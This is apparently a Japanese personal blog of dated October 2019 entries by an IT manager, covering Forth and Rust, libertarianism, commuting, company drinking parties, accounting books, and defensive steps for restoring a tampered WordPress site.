2019-10-05何歳で起業して年商何億で、という若造が都内にたくさんいるのは知ってるし、それはそれで或る意味では大したもんだと思う。せいぜい、いろいろと考えて金は使ってもらいたい。なんとなれば、金持ちの責任というのは、金を更に増やすことではなく、金をうまく減らす(使う)ことにこそポイントがあるからだ。そして、日本で若くして大金を手に入れた人々の大半が、ロクでもない、くだらない金の使い方しかできていないのは、IT業界を見れば明白であり、やはりインチキでもなんでもしてそれなりのレベルの金持ちにはなれても、そういう連中はそこまでの人間だったということでしかないということがわかる。それならなおさら、さっさと他の経営者に投資するなり散財して使い切ってしまえばよかろう。こういう人々の得意とする理屈によれば、そうする方が《経済が回る》のだから。(この、《経済が回る》という観念も、かつてバタイユの蕩尽り論を援用して栗本慎一郎氏などが叫んでいたわけだが、相当に怪しく、本当にまともなレベルの経済学の理論として正当化できるのかどうかも分からない。)Also there are young rich men as a result of an easy business on the web or confidence tricks. Okay, boys. You are riches, and so what? You can buy a home in Aoyama, invest on another easy IT ventures, make a party with an idol girl as an expensive outcall escort, but so what?#here

2019-10-04さきほど Forth の話をしたが、僕は趣味として勉強してもいいとは思うが実務で使う気はない。商業的な実装例があるのは分かったけれど、しかし表立って多くの人が知るような事例まではないからだ。つまり、(1) 商業的な実装が可能となるまでの学習コストが高すぎるか、(2) 原理的に現代の OS なりオンライン・サービスの開発に採用する積極的な利点が全くないか、あるいは (3) 今世紀に入ってからの関連書籍が少ない事情から見て COBOL のように特殊な環境・用途での事例しかないという、いずれかの理由が考えられる。特に、枯れた開発言語であれば、COBOL ですら5年ほど前までは新刊の解説書(邦書)が出ていたくらいなのに、Forth の日本語の本は1980年代に何冊か出ただけであって、30年くらい新刊書が全く出ていない(おそらくはアマチュアが暇つぶしに書いたような低レベルの電子書籍なら幾つかあるが、僕らプロの実務家にとってはそんなゴミはどうでもいい)。ゆえに、開発言語としては何らかのメンテナンス目的ですら使われていないと想定しても不当ではなかろう。仮に使われていたとしても、そのベンダーに所蔵されている古い書籍や、社内で免許皆伝の巻物みたいに伝承されている独自のドキュメントだけで仕事ができるということに他ならないのだから、公的には死んだ言語と断定してもよいはずである。あるいは、幾つかある処理系のマニュアルだけで仕事ができるほどシンプルなのだとも考えられるが、それほど学習コストが低い言語が全く普及していないのはおかしい。

2019-10-04『日本原価計算制度形成史』(建部宏明、2019)が届いていた。坊主が入ってるし、栞もアセンブリしたままなので、これは新古本だろう。よい買い物をした。

2019-10-04僕はこんなもんどうだっていいと思ってるんだけど(返礼品として注文されながら使われなかったという被害を受けた業者はあるにしても、損してる人が殆どいないわけだし)、とにかく「返礼品」というのが貧乏臭い。実質は寄付なのだが、「納税」であれ「寄付」であれ、そういう行為に返礼を要求したり期待するという連中は、やっぱり所得税や健康保険も元を取るという意識で納めてるんだろう。税金の一部は警察や消防署にも使われてるんだけど、そういう性根の人間は《元を取る》ために自分の娘を殺したり、自宅に放火するのか?ふるさと納税の泉佐野市除外、総務省は国地方係争処理委員の勧告を拒絶して継続へ | スラド

2019-10-04なかなか面白い。これを、出たゴミの分別という短絡的なことだけに着目するのではなくて、意図しないゴミが多いなら買うものをどう調整すればいいかとか、売り物の包装をどう変えたらいいかという具合に、考え方や行動や規制にフィードバックさせることが大切になるのだろう。要するに、AI でどうこうとは言っても、最後は人が何をやるかが肝心なのだ。Greyparrotには、今後の新しいユースケースのアイデアがある。例えば、ごみ集積容器がその技術を組み込めば、最初の時点でごみを自動的に分類できる。また、自動販売機の隣りにある空き瓶空き缶返還器をGreyparrot化すれば、ユーザーのアカウントにごみの種類に応じてお金が入るだろう。コンピュータービジョンでごみ処理を改善するGreyparrot | TechCrunch Japan

2019-10-04インデアンカレーの大は830円になってた。

2019-10-04現在 Forth を紹介するというのであれば、せめて関連するページを検索して下記のようなドキュメントは紹介するのがよいだろう。今年の6月から数か月で全て訳出されていて、きちんとした成果の一つとして賞賛するべきだと思う。山形浩生さんの自称ではもっと早く訳出できるのかもしれないが、趣味的に翻訳したとすれば相当なハイペースで訳出されていると言っていい。下訳は機械翻訳を使ってもいいけれど、"The philosophy is not generally described as something apart from Forth" を「Forthと哲学は不可分の存在です」と意訳しているので、恐らく機械翻訳のままではないと思う(もしこのレベルで機械翻訳できるようになったというなら、翻訳家の半分くらいは仕事を失うだろう)。https://thinking-forth-ja.readthedocs.io/ja/latest/index.html

2019-10-04古本の紹介をしてるだけで、これではプログラミング言語の introductory なドキュメントとして体を為していない。「研究会」と名乗っているが、はっきり言って名前負けもいいところだ。あと、日本語のリソースを検索すると、あいかわらず Qiita を始めとして摘まみ食いの紹介文みたいな薄っぺらいコンテンツしかない。たぶん、記事を書いた後には何ら実装すらしてないような小僧のメモ書きにすぎないのだろう。何度も書いたことだが、日本の技術者が書くこの手の記事というのは「序章」ばかりなのだ。開発事例というリアリティもなければ、基本的なアイディアの掘り下げという理論もない。何のために書いているのやら、都内のベンダーに就職したり転職するための事実上のパフォーマンスやケーパビリティ・プレゼンかと思うようなパターン化した記事しか書いていない。このホームページはプログラミング言語FORTHの展示場です。http://www.sofel.co.jp/forth/forth.html

2019-10-04SAKURA インターネットは、クラウドが月末で締まるから明細は管理画面で確認できるんだけど、うちは特別に請求書払いにしてもらってるから、結局は専用サーバと同じく毎月の10日にクラウドと専用サーバの稟議を同時に出して通してから、経理に料金を振り込んでもらっている。これも、そろそろ会社のクレジット・カードを使えるようになったようなので、クラウドだけはカード決済に戻してもいい。カードの引き落としなら前月の明細が発行された時点で、すぐに稟議を通しておけば、専用サーバとは違って支払い依頼という手続きを省略できる。というか、専用サーバもカードで決済するように契約内容を変更してもいいな。この手のインフラ系の契約は、クラウドのように短期間の支払いで受託案件の「原価」として算定した方がいいからカードにしなくてもいい場合もあるが、まぁ自社で使う場合は固定費として扱っていいから、全てカード決済でもよかろう。

2019-10-04Forth というプログラミング言語は、昔からコアなファンがいて面白い記事を見かけることがある。意外と歴史も長くて、組み込み系での実績があるし、スタック指向というパラダイムにも興味を引き付けられるけれど、記法が COBOL っぽいというか、古臭い印象だ。そういや、これに影響を受けて作られた Factor という言語もあるけれど、これを日本でせっせと解説していたインフォサイエンスという会社さんのサイト(「あしたのオープンソース研究所」という、博報堂のコピーライターが考えそうなネーミング)を久しぶりに見ると・・・なんだとっくに運営放棄されてるじゃん。更新履歴をたどると、わずか3年で終わってるのか。これ、運営会社さんのやる気のなさをアピールすることにもなるので、サイトそのものを閉鎖した方がいいと思うよ。http://oss.infoscience.co.jp/factor/factorcode.org/

2019-10-04crontab のスケジュール定義は、いちど覚えたら大したことはないのだが、うろ覚えで書くと酷い結果に至ることがあるため、こういうツールで確認してみるのもいい。We created Cronitor because cron itself can't alert you if your jobs fail or never start. With easy integration and instant alerts when things go wrong, Cronitor has you covered.https://crontab.guru/#23_0-20/2_*_*_*

2019-10-04託児所とか学童保育について、たとえば「文京区に住んでて何言ってんの」とか書く人がいるんだよね。何を誤解してるのか知らないけど、文京区に住んでるくらいの金持ちなら、行政に文句言ってないで金を出して誰か雇えという主旨らしい。こういう人たちは、恐らく文京区に住むどころか実際に歩いて見たことが一度もないんだろうと思う。やれ文京区には東大があるとか、お嬢様が通う高校があるとか、有名なバレエ・スクールが幾つもあるとか、女性雑誌やワイドショーしか目にしていないで勝手に特定の地域や街に幻想や偏見をもっている。こういうのも、たぶん部落差別や同等の地域差別を再生産してしまう思考なのだろう。なお、僕が自分の住んでる国を「東アジアの辺境地帯」と書いてるのは、それくらいの節度を持てという趣旨で書いてるだけなのだが、しかし何割かは本当にそうだと思ってるんだよね。色々な意味で日本は「後進国」と侮蔑されるに値する。

2019-10-04中途半端に景気が悪いだけだと、安くなら買えるという人が多いので、Uber Eats のようなサービスが普及する余地はあるんだろうけど、日本のようにまだ景気が落ちる可能性の高い国では、サービスを展開しても大きな収益にならないので、外資系の企業は算入しないし撤退する。皮肉にも、そうして僕らのプライバシーは逆に安全になるというわけである。実際、アフリカでは僻地でも携帯を使うようになったけれど、南アメリカの辺境地帯ともなれば IT 企業のどこであれ住人のプライバシーなど全く分からないだろう。

2019-10-04船場センタービルにある「槇尾古書店」のアカウントを見つけた。恐らく「名前」の欄を入力せずにアカウントを作成したからか、スパム業者が使うようなアカウント名だが、投稿内容はごく普通のもので、リンクさえクリックしなければ大きな危険はないだろう。https://twitter.com/2rENVlihbY4mpnW

2019-10-04これは明白な事実として強調していいと思うのだが、リバタリアンの大多数は《彼らが批判している筈の現行制度での成功者》なんだよ。つまり、自分たちが叫んでるような《自由》が実現されたときに、その条件でも自分たちが成功する保証なんてないのに、既にこの人々はスタート・ラインに戻ることはないから、実は無関係なんだよね。自分自身の資産や社会的な地位や生命を賭けて結果に責任を負う必要もないし、言ってみればアイン・ランドの客観主義やリバタリアニズムというのは、社会科学の素人が口走る箱庭理論にすぎない。あるいは、世の中がこうであれば《われわれはもっと即座に、もっと金持ちになれた筈だ》という、根拠のない傲慢な妄想でしかないのだ。I don't trust libertarianism in need of an enforcement to establish itself in the legislation and national-wide administrations. Ironically, it will be an ultra-socialism to force the liberty in everywhere. Most libertarians especially in IT industry are winners in economical, political, cultural systems ***at that time***. So, their "theory" means that they could be winners earlier if the case was different, or that they could get more money if the system was different...#here

2019-10-04そもそも、女性専用車両とか子育て応援スペースとか、そんなもんが必要になる状況を放置している実情をどうにかしたいところではある。恐らく半分の会社が営業開始時刻を1時間ほどズラしたところで、満員電車は解消しないからだ(都内に限った話ではないが、多くの田吾作はそういう状況だと「定時から1時間早く出勤して点数を稼ぐ」という行動をするか、前と変わらない時刻に出勤して会社の近くにあるコンビニやスタバへ入るだろう)。つまり、都内に会社や事業所が多すぎるということが根本的な原因であるから、これを数年や数十年で解消するのは無理である。それこそ直下型の大規模な地震で8割ていどの企業と人員が壊滅的な被害を受けない限りは、何も変わらない。もちろん東京都は法人税が減るのは困るので、積極的に事業所を他の場所へ送り出すような施策を実行するわけがない。ということで、現実には満員電車という状況で起きる痴漢とか、スリとか、身体がぶつかって起きるクソ中小の三下どうしの喧嘩とか、あるいは妊婦いじめや身障者いじめを減らすには、弱い立場の人たちを特定の場所で保護する他にない。それにしても、そういう施策をやると、すぐに逆差別だと言っては被害者ヅラする人間が出てくるわけで、あいかわらず田吾作の巣窟である東京の行政というのは苦労が多いと思うよ。子育て応援車両への批判は、子連れは遊びに行くもの、応援車両は他の客は乗れないという誤解から生まれる?(小酒部さやか) - Yahoo!ニュース

2019-10-04日中にインターンの話を少しだけ書いた。実は僕がシステム部長をやっている頃にインターンを二人ほど採用したことがあった。もちろん、具体的な案件の開発を手伝うとか、そんなのは無理である。そもそも当時の専門学校出身者と言えば、使える言語は C か Java くらいで、個人的に遊びで PHP や Perl を勉強してる人がいたくらいだ。そんなわけで、確か10年以上前に流行った、二枚の写真を並べて好き嫌いとかを次々と判定してもらう遊びのようなサービスを設計から実装までやってもらった筈だ。ただまぁ、その頃の僕は例の西新宿案件で忙殺されていたため、具体的な指導は部下のプログラマに任せていた。そういう次第で、毎週やってた会議で進捗は聞いていたが、具体的にどんな指導をしてどう作ってるかはほとんど見る余裕がなくて終わってしまった。他にもウェブサイトの制作部署で何度かインターンを受け入れていたようだが、やはり具体的な業務の手伝いは任せられない。なんだかんだ言ってもナショナル・クライアント案件なので、発売前の新製品だとか、知財に絡む情報とか、芸能人のレタッチ前の写真とかを扱うので、まだ「バイトテロ」なんて言葉が出てくる前のことだが、やはり危険である。作業のクォリティも、インターンがやるのを待って、ダメならこっちで修正するか指導してやり直させる・・・なんて余裕が電通案件にあるわけない。すると、結局は指導が簡単ではあるけれど、いまやってる仕事に関係があるのかどうかわからない単純作業や雑用を任せることになるわけで、そらインターンもつまらんと思う。求人情報にはクリエーティブだ、ナショナル・クライアント案件だと書いていながら、やらされるのは企画書に使う資料を検索で集めてくるとか、コピーを 1,000 本くらい書かされるとかだし。

2019-10-04なにやら元ライブドアの社長がN国から立候補するとかで騒然となっているらしい。前にも述べたように、ポピュリストの言ってることは口先だけならホリエモンのようなリバタリアンと似ているので、どっちがどっちを利用する目算なのかは知らないし結局は些末なことだが、表面的に同調するのも分かる。ていうか、そもそもポピュリストとはそのときの時流に合わせて自分がムカつくことを叩いて回ってるだけなのだから、リバタリアンの、言わばハイパー社会主義というか極め付きの放任という管理社会(自由を強制する世の中)が趨勢なのであれば、ポピュリストはそれに合わせて放縦を旨とする暴言を吐いて回るだけでいいのだ。そして、ネトウヨが強くなれば同じように言えばいいし、社会民主主義が強くなれば表向きだけ合致するようなことを言える・・・これも形式的には《政治》であると言えるからには、やはりこういう人々を送り出す有権者にこそ大きな責任があろうというものだ。何年か前に選挙制度の本を読んだけれど、選挙制度なんてゲーム理論の細かい理屈なんか、本当のところどうだっていいんだよ。中選挙区制だろうと比例代表制だろうと、得票数がゼロの政党や候補者には何の権力もないという一点だけ分かっていればいいのである。

2019-10-03Beginning Rust (Apress, 2018) は、アマゾンのおすすめ順に並べると相当に下の順位となってしまう。英語としても読みやすくて手堅い入門書だと思うから残念ではある。公式ドキュメントの翻訳が優先するのはいいとしても、星が一つか二つの本どころか星が全くないコピペの海賊本よりも順位が低いというのは、いったいどんなランキングで並べているのか。ただ、Rust の解説で最初の関門と言える "mut" は、この本でも "Given that the word 'variable' is used both to associate a name to an object that may be changed, and to associate a name to an object that cannot be changed, the variables of the first kind are named 'mutale variables', while the second ones are named 'immutable variables'" と解説されていて、単純に言えばいいところを少し分かり難くはなっている。プログラミングの基礎的な素養がある人に限って「え?」となりやすい。簡単に言えば、PHP などで言う defined された(PHP 7 なら "const" を使えばいいだけだ)「定数」も、Rust では "immutable variable" と呼ぶわけだ。

2019-10-03昨日、僕も或るアカウントを運用していて、URL を添付したツイートを投稿できなくなっていた。何度も試したが、「既にあんたツイートしてるよ!」というエラーしか出てこなかった。画像やURLを添付したツイートができないほか、「トレンド」「ブックマーク」などの機能が表示不能となっている。編集部ではWeb版とAndroidアプリで動作を確認したが、いずれも同様だった。「Twitter」で画像投稿やURL付き投稿などができない障害が発生中

2019-10-03なんか最近、アパレル・ファッション関連の大型倒産が多い印象があるな。

2019-10-03話が設計に限定されてるからだろうけど、リスク・マネジメントにおいて脅威を悪意として想定しないなんてことは、少なくとも僕らのようなプロのセキュリティ・マネージャにおいてはありえない話だ。単なるケアレス・ミスのようなヒヤリハット的な事象だけがリスクだなんてのは、素人のリスクの議論だからである。ただ、それは運用についての話が大半であり、やはりシステム開発や器具の設計においては、フール・プルーフのような基準が優先されて、ユーザが悪意をもっているという前提でハサミを設計したりはしない・・・ただ、ゲームとか、あるいはアダルト・サイトの設計だと、利用者が悪意を持ってる想定はするというよ。まぁ、ユーザにクソみたいな人間が多数いるという前提なり現実があるからなんだけど。今日のデザイン過程では、自然災害や使用者側の単なる誤用については、リスク評価と緩和が行われている。しかし以上のような例を考えるに、悪意もまた考慮すべき要因であり、そのための明確なガイドラインが必要である。既に兵器工業においては、悪意への脆弱性の評価が行われており、これは民間においても行われるべきだ。悪意を考慮してデザインする責任 Kemper (2004)  - えめばら園

2019-10-03そういや、野本和幸さんはまた大著(『数論・論理・意味論 その原型と展開: 知の巨人たちの軌跡をたどる』)を出してたなぁ。以前、岩波から出ていた歴史的な概説書(『現代の論理的意味論』)と同じ時期を扱うものだけれど、更に煮詰めたような内容だ。それなりの値段だが、こういう記念碑的な著作は仕方がないのだろう。医学書を買うと思えばいい(実際には医学書と比べても割高だが)。

2019-10-03クラウド・ファウンディングはこちら。https://www.gofundme.com/f/justin-zylstra-memorial-prize-in-metaphysicsThomas Pashby (University of Chicago) has begun a campaign to fund the “Justin Zylstra Memorial Prize in Metaphysics“.Justin Zylstra (1987-2019) / Memorial Prize - Daily Nous

2019-10-04今週は土曜日に朝から用事があるかもしれないので、金曜日に予定されている経営会議は終了後の懇親会を欠席することにした。もちろん、そもそもこんなのやっても経営とか売り上げとかに何の関係もないことは自明の話だし、よく言われる士気とか付き合いなどの効用も無関係だ。寧ろ、この手の懇親会で騒いだり毎日のように同僚と飲み食いしてる人間こそ、すぐに退職していくものだというのが僕が経験則であり、これはいまのところ正しい。つまり、こんなことをしたくなるのは、寧ろ仕事が嫌だという危機的な心理状態の反映であり、業績が上がっていない結果なのだ。それから、こんなことを夥しい数の企業がやってきた結果が《これ》(いまの日本)なのだから、懇親会や飲み会なんてものに意味がないことは学問や知識などなくても経験だけで分かる話だ。でも、凡人には慰労というか凡庸な者どうしで傷を舐めあうという儀式のようなものがあり、東アジアの辺境地帯ではそのような土俗的慣習がえいえいと続いているのである。持ち出しで参加を求められていた頃は、実質的な減給処分と同じだったが(どのみち参加しても飲めない人間は元が取れないし、元をとるためにウーロン茶を馬鹿みたいに飲むのは愚行でしかない)、現在はコンプライアンスの点からも強制するなら業務なので会社が負担するのが当然だという、まことに結構な体裁となっているため、時間の浪費である点を除けば社交として仕方のないものでもあろう。まぁ、その代わりに殆ど喋ってなくて、頭の中はぜんぜん違うことを考えてるけど。

2019-10-03大昔の ISMS や PMS で使った帳票とか古い版の規程類とか、そういうのをスキャンしたうえでシュレッダーに通して破棄したいのだが、なかなか進まない。スキャンはキヤノンの複合機に通せばいいのだが、ともかく量がたくさんあるし、やはり過去の帳票や規程類と言えばステープラーで綴じているため、針を抜くのが面倒臭い。部下がいるわけでもなければ、総合職(要するに雑用)の社員がいるわけでもない。インターンは有効かもしれないが、制作部署で何度か採用したものの教育コストがかかりすぎて、採用を止めてしまった。現在、ステープラーは抜くのをやめて切り落としている。抜いても、抜いた跡にできる紙のちょっとした凹凸で、すぐに複合機の内部で紙詰まりを起こすことが分かったからだ。

2019-10-03そういえば、京阪中之島線の渡辺橋駅から地上へ上がる階段の途中で、折り返しになっている箇所を奇妙な経路で歩く人がいる。簡単に言えば、GT カーのコーナリングかと言いたいような経路で、外・内・外と曲がるのだ。昇るときは左側・右側・左側の通行となり、降りるときは右側・左側・右側の通行をするため、途中から右側通行したり左側通行したりと自分勝手にレーンを替える人々に困惑させられることもある。こういう連中は、たぶん他の歩行者をゲームの NPC か、レース・ゲームの観客(車で思い切り突っ込んでも死なないし、ゲームによっては擦り抜けられる)だと思っているのだろう。

2019-10-03本を読んで、これは読んだことで初めて分かったことだとか、これを読まなければこういう考え方はできなかったと思えることが一つでもあれば、成果があったと言っていいと思う。仮にそれがコピペ構成作家の自称歴史書であっても、世の中にはこんなバカがいるのだと分かるだけでも一つの発見と言ってよいわけだ。そういう本が出版されることは、もちろん何人かのバカが影響を受けて偏見を補強してしまうのだから、害悪には違いない。しかし違法でない限りは世の中にゴミが生じるのを止めたりはできないので、世の中にはゴミがあるという事実を知る材料として消極的ではあるが利用する方がマシであろう。その他にも、本を読むことで参考文献から他に関連する本を読む動機も生まれるだろうし、登場人物や著者自身についての興味が生まれるかもしれない。僕が鹿持雅澄について関心をもったのも、『やちまた』で描かれていたからであった。それから、その本に出てくる出来事や思想、あるいは理論とか用語とか概念についても、興味をもつきっかけになるかもしれない。本当のところ、たいていの本は自分が知らないことについて書いてあるなら、コンサルや広告代理店系の人々が好んで言う「気づき」なんて1冊の中に数多くある筈なのだ。何度もくりかえすが、全てのヒトは個体として知識も経験も有限でしかない凡庸な生き物だからだ。よって、新書一冊でもこだわって一つ一つの文章を検証したり詳しく学んでいけば、いわゆる「分析的な読み方」とか「批判的な読み方」というのは幾らでもできる。しかし、それをいつまでも延々と続けられるわけでもないのが有限な寿命しかもたないヒトの限界なので、一定の基準を作り上げては、どこかで割り切るというコミットメントを必要とする。

2019-10-03剽窃や単なる翻訳を自著として出すのは論外だが、翻案と言ってもいいような論文であれば、昔から数多くの人々が言ってきたように、日本の人文・社会系の研究者でそういう論文を書いたことがない人はどれくらいいるのかという話を真剣にやっていいほどの状況ではあろう。また、誰それの、何とかにおける、これこれ概念の、しかじかについてという論文のフォーマットは、手堅い修士論文を書くためのお作法として、それなりに日本の大学では受け継がれてきたものであろう。もちろん、これまでも述べてきたように古典の研究なり歴史的な再構成というものは必要であり、誰それのしかじか論文も大切な業績の一種である。敢えて言うが、いまやオープンに業績を公表できる手立てが幾らでもあるわけなので、個人のブログでも preprint サーバでもいいから、現況の3~5倍ていどの分量で論説を表に出してもいいくらいだ。特に日本は(ひとまず僕自身の実績は棚に上げるとして)学部生どころか院生のパフォーマンスが非常に悪いという印象がある。Translation Plagiarism in Philosophy - Daily Nous

2019-10-03学ぶときの実務という観点を重視するのは高く評価していいと思う。また、僕はかなり疑わしいと思っているが、哲学を学ぶことによる生涯年収への影響というトピックスを差し挟む世俗的な効用(そもそも効用と言えば、およそ世俗的である他ないだろうとは思うが)も、一つのコンテンツとして収録してもよいのだろう。なぜなら、マッキンゼーのコンサルや IBM の営業を志望して哲学を学ぶという人々にとっては格好の教材だが、僕らのように哲学者としてものを考えたり生きることを選択するような人間にとっては、簡単に無視できるノイズにすぎないからだ。一部でもクズみたいなことを書いてるという理由で出版物を非難しはじめたら、もう現代では読む本などなくなってしまうし、そもそも凡庸な個体でしかありえないヒトの成果など、ノベール賞を受けていようとハーヴァードの教授だろうとたかが知れているからだ。そんなことに厳格な原理主義を適用したところで、もちろん自分自身も含めて有限かつ未熟で下等な生物種にすぎないホモ・サピエンスに、どれほどのことができようか。21世紀の哲学教科書 - まとまり日記

2019-10-03僕が高校時代に書店で手に取った35年前ですら古臭いという印象があった単語集だけれど、薄い冊子に数多くの単語が整理されているので、実際には使わなかったが(MD で公開している「英語の勉強について」でも書いたように、僕は高校時代も学部時代も単語集というのを英語の勉強では使わなかった)いまでも蔵書として残してある。古書としてかなりプレミアのついてる本だが、確かに最近の単語集を見ても、これだけ詰め込んでるものは少ないから、何らかの価値はあるのだろう。僕も、当時は情報量が多いという点だけで買ったのだろうと思う。でも僕には、やはり単語の羅列とか語根で整理するというだけでは覚えにくい。入試頻出7000英単語の総整理https://www.amazon.co.jp/dp/4844200534/

2019-10-03役員の勤怠を ChatWork へ投稿するのに、僕のアカウントで取得してる ChatWork API と Zapier を使っている話は、既に何度か書いている。僕のアカウントを使っているので、当然だが役員の勤怠を僕の名前で投稿している体裁になっていて、全ての部署の勤怠連絡用グループに僕のアカウントで参加せざるを得ない。つまり、単刀直入に言えば、ChatWork にも「ミュート」の機能が欲しいということだ。自分の管掌であるバック・オフィスのグループを見るのは構わないが、他の事業部門の勤怠なんて僕にはどうだっていいからだ。サイド・バーへ視線を動かしたときに余計なノイズが視神経を刺激すること自体、仕事の邪魔である。

2019-10-03既に疫学だろうと他の分野だろうと Bayesian statistics なり因子分析を使う人たちのあいだでは、スキームの話だけではなく具体的なプログラムを公開して成果を出すということが求められる。もちろん、コンピュータでの解析が可能な範囲での成果という但し書きは付くけれど、恐らくアメリカの大多数のプロパーからすれば "So what?" という返事しかありえないだろう。そこから先が必要になれば、初めて他の数学的な手法を考慮すればよい。Jamie Robins and I are working on a book that provides a cohesive presentation of concepts of, and methods for, causal inference. Much of this material is currently scattered across journals in several disciplines or confined to technical articles. We expect that the book will be of interest to anyone interested in causal inference, e.g., epidemiologists, statisticians, psychologists, economists, sociologists, political scientists, computer scientists… The book is divided in 3 parts of increasing difficulty: causal inference without models, causal inference with models, and causal inference from complex longitudinal data.https://www.hsph.harvard.edu/miguel-hernan/causal-inference-book/

2019-10-03会社のメール・アドレスで受信しているから当然と言えばそれまでのことだが、とにかく営業メールのほぼ全ては、営業お助けサービスと、人材紹介と、「エンタープライズ」を自称するロック・イン目当てが見え見えの特殊なグループウェアや些末な販管システムだ。ビジネス・プロセスに新しいスキームを提案するような発想のサービスは皆無と言っていい。それでも、プレゼンテーションや出力は計算書のように決まっているものの、入力の方は法令の範囲で工夫の余地はまだある。それゆえ、中小企業には freee("e" が幾つ繋がるのか興味はないが、どこのサービスなのかは実務家なら知ってるだろう)のようなサービスも生まれるし、契約書などではクラウドサインのようなサービスも出てくる。クラウドサインのようなサービスは、弁護士や会計士の裏書きなり実績が集まれば、これ単独でも上場できるくらいの事業だ。

2019-10-03アマゾンで注文した古本の一つは『日本原価計算制度形成史』(建部宏明、同文舘出版)という会計学史の著書で、今年の4月に発行されたばかりなのに送料と合わせて 1/4 くらいの値段で売っていた。会計は何年か前から制度史や原則論の通俗本が出回るようになっていて、この分野としては簿記のような実務向けの書籍を除くとプチ・ブームと言ってよい。おそらくは、山田真哉氏による、さおだけ屋の話を扱った本がきっかけなのだろう。でも、それで営業が経費精算の手続きを適正にやるようになったかというと、そんなことは全然ない。ああした本は、実際には会計に携わる人々やバック・オフィスの新卒、つまりは最初から会計に関心があるプロパーが読んでいるので、自己充足的なセールスだったと言っていいと思う。

2019-10-03Amazon.co.jp で、アマゾンが発送元になってる古本と、予約した新刊の小説(『白銀の墟 玄の月』上下巻)とで、合計の請求金額は2,926円なのだけれど、コンビニ払いでは古本と新刊の支払い情報が同じ ID のため、まったく同じ値段となってしまい、片方の金額(1,407円)しか払わなかった。でも、注文履歴では2,926円分の両方を支払っていることになっている。予約注文の方は、実際に発売されてから支払い情報がメールで送られてくるかもしれないので、しばらく様子を見るのだが、大丈夫なのだろうか。

2019-10-03「自分史」は最近の小さなブームとなっているが、70年代頃から歴史学者の提唱で少しずつ普及してきたようだ。いまでは、愛知県春日井市に「日本自分史センター」という施設まであるらしく、この春日井市は森浩一先生の蔵書を受け入れている図書館もあって、特徴のある文化施設がいくつかある。

2019-10-02いまどきの XSS でも SQL インジェクションでもいいけど、ウェブ・アプリケーションに対する攻撃の結果というのは、それこそ昔のウイルス感染の状況などとは違って、目に見えて劇的に何かやられたという具合には見えないから、攻撃の実演をやっても逆効果になったりするんだよね。多くの人が攻撃の影響を過小評価してしまう。なんだ、「じゃじゃーん! あなたのコンピュータは汚染されました!」みたいなことは起きないし、大したことないじゃないか、と。もちろん、それは軽率な判断である。ごく自然に振舞っているかのように思わされつつ、情報を盗まれたりするわけだから、余計にたちが悪い。フィッシングやセッションの詐取というパターンだけを想定しても、まず盗まれたことになかなか気づかないので、自覚も発見も対応も遅れるから、手遅れになってしまう可能性が高くなる。カード決済の請求書が来て初めて分かるとか、WordPress のアカウント情報なら昔の記事をたまたま見て気づくという事例も多い筈だ(最近の WordPress を攻撃するプログラムは非常に巧妙で、最新の記事からたどって昔の記事、しかも全てではなく一部の記事だけを書き換えるため、改竄に気づきにくくなっている)。騒がれてから WordPress の対策を施しても、既に改竄されているページがあることに気づかなければ、それ以降は対応できても、既に改竄されているページを放置したままになるということも多い。したがって対策するときは、できるだけ一時的にメンテナンス・モードとした状態で、過去の記事が既に改竄されていないかどうかを確かめるという手順も必要だ。記事は全てエクスポートしたものを目視で確認するのがいいし、プラグインはいったん全てダウンロードして WinMerge のようなソフトを使って書き換えがないか比較する。それから、もちろんテーマをダウンロードして(ローカルにオリジナルがあれば比較してもいいが)、ファイル数が少なければ、これも目視で確認する。どうなっていたら改竄されていることになるのかという判断基準は、まぁ情報セキュリティの知識がないなら、単純にファイルを比較したときに内容が違うということだけでもいいだろう。そして、オリジナルのソース・コードで上書きして、元に戻せばいい。コア・システムの確認は、もちろんファイルの比較をしてもいいが、たいていの人には難しいので、可能ならインストールし直した方がいいだろう。ftp や ssh のアカウントを盗まれていない限りは、再インストールでいい筈だ。というか、ウェブサーバにアクセスする権限を奪われていたら、何をやっても無意味である。ftp や ssh のパスフレーズなり鍵を入れ替えるしかないが、それ自体も既に仕込まれているプログラムで捕捉されてしまっている可能性があるため、根本的な対処(つまりサーバの交換や OS の再セットアップ)しかないかもしれない。こういう場合、クラウドのインスタンスとしてウェブサーバを立ち上げているなら、非常に楽だ。

2019-10-02FreeBSD のユーザであれば、ps コマンドでプロセスを眺めるときに "adjkerntz" という奇妙な名前のプロセスが走っているのを見かけるだろう。もちろん、"man adjkerntz" で分かるように、これは CMOS の時刻とカーネルの時刻を調整しているプログラムだ。要するに、このプログラムは "adjust kernel timezone" の略である。作者は Andrey A. Chernov という人物で、FreeBSD の初期からコア開発者として加わり、数多くのプログラムに関わってきたのだが、残念ながら2017年の8月に長患いの末に亡くなっている。このチェルノフ氏はロシア語のキリル文字を扱うためのエンコーディングである KOI8-R を作成したことでも知られていて、時刻調整のプログラムを書いた人物という紹介の仕方だと不十分でもあろう。なお、adjkerntz は FreeBSD 1.0 の頃から使われていたと言われているが、FreeBSD 1.0 のソースコード(分割圧縮された sbin のディレクトリ内)には、"adjkerntz" として実装されたコードは見当たらなかった。最新版のソースコードは、下記のリンクで展開できる。freebsd/freebsd

2019-10-02経営陣にも研修が必要だという話を書いたが、もちろん不必要な技術や規格の知識など経営陣がもつ必要はない。いっとき、mixi の笠原さんが子供の頃に父親と暗号論や離散数学の話をしていた(数学者の笠原晧司さんだと思っていたが、同じ京大の教員でも工学部の笠原正雄さんが父親らしい)といった逸話に象徴されるように、IT ベンチャーやネット・ベンチャーの経営者たるもの、統計学を学んだり Linux のカーネルをコンパイルできなくてどうするといった(僕に言わせればイノベーションや事業経営と何の関係もない)バカ話が色々な経済雑誌でささやかれるようになった。そのような趨勢の中、弊社の代表は、さきほども「USBメモリのデータって、どうやって取り出すんですか?」と弊部まで聞きに来て、Windows にはエクスプローラという便利なプログラムがあることを学んでいったわけだが、このレベルでも20年の事業継続を誇っている。では、自分で R のモジュールが書けるとか OSS のプロジェクトでコミッタをやってると豪語しながら、東アジアの東京とかいう辺境地域で IT ベンチャーを経営するおチビちゃんたちは、5年以上の事業継続の経験はあるかな? あるとしても、あぶく銭をふんだんに持ってる同じようなガキの VC に資金をせびりながら、なんとか遊び続けているというのが実情だろう。もちろん、事業を長く継続さえすればいいというものではない。それは確かだが、短いなりに劇的な成果を何か残してやめるならともかく、そんな事例は殆どないはずだ。"exit" 